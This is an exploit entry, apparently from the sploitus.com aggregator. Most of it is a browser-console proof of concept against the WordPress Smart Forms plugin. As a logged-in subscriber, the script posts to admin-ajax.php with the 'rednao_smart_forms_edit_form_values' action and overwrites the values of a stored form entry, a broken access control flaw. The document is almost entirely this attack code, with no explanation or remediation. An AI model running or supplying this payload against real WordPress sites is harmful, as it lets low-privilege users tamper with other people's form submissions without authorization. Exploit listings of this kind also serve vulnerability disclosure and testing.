Share
## https://sploitus.com/exploit?id=WPEX-ID:BBC6CEBD-E9BF-4B08-A474-F9312B3C0947
While logged as a subscriber, paste the following in your browser's console:
fetch('/wp-admin/admin-ajax.php', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: new URLSearchParams({
'action': 'rednao_smart_forms_edit_form_values',
'entryId': '7',
'entryString': '{"rnField1":{"value":"Mr Hacker"},"rnField2":{"value":"mehdi@mtest.com"},"rnField3":{"value":"SUCCESSFUL FIELD HACK"}}',
'elementOptions': JSON.stringify([{"_id":35,"ClassName":"rednaotextinput","IsRequired":"n","Formulas":{},"Styles":{},"ContainerOptions":{"Width":-1,"Id":"35","Type":"single"},"Id":"rnField1","Spacing":"col-sm-12","Label":"Name","Placeholder":"","Value":"","ReadOnly":"n","Width":"","Icon":{"ClassName":""},"CustomCSS":"","Placeholder_Icon":{"ClassName":"","Orientation":""},"_Selected":true},{"_id":36,"ClassName":"rednaoemail","IsRequired":"n","Formulas":{},"Styles":{},"ContainerOptions":{"Width":-1,"Id":"37","Type":"single"},"Id":"rnField2","Spacing":"col-sm-12","Label":"Email","Placeholder":"","Icon":{"ClassName":""},"CustomCSS":"","Placeholder_Icon":{"ClassName":"","Orientation":""},"Value":"","ReadOnly":"n","_Selected":true},{"_id":37,"ClassName":"rednaotextarea","IsRequired":"n","Formulas":{},"Styles":{},"ContainerOptions":{"Width":-1,"Id":"39","Type":"single"},"Id":"rnField3","Spacing":"col-sm-12","Label":"Message","DefaultText":"","Value":"","Width":"","Height":"","Placeholder":"","Disabled":"n","MaxLength":"","CustomCSS":"","Placeholder_Icon":{"ClassName":"","Orientation":""},"_Selected":true},{"_id":38,"ClassName":"rednaosubmissionbutton","IsRequired":"n","Formulas":{},"Styles":{},"ContainerOptions":{"Width":-1,"Id":"41","Type":"single"},"Id":"rnField4","Spacing":"col-sm-12","ButtonText":"Send","CustomCSS":"","Icon":{"ClassName":"glyphicon glyphicon-send","Orientation":"Add"},"Animated":"y","Action":"submit","_Selected":true}])
})
})
.then(response => response.json())
.then(data => console.log(data))
.catch(error => console.error('Error:', error));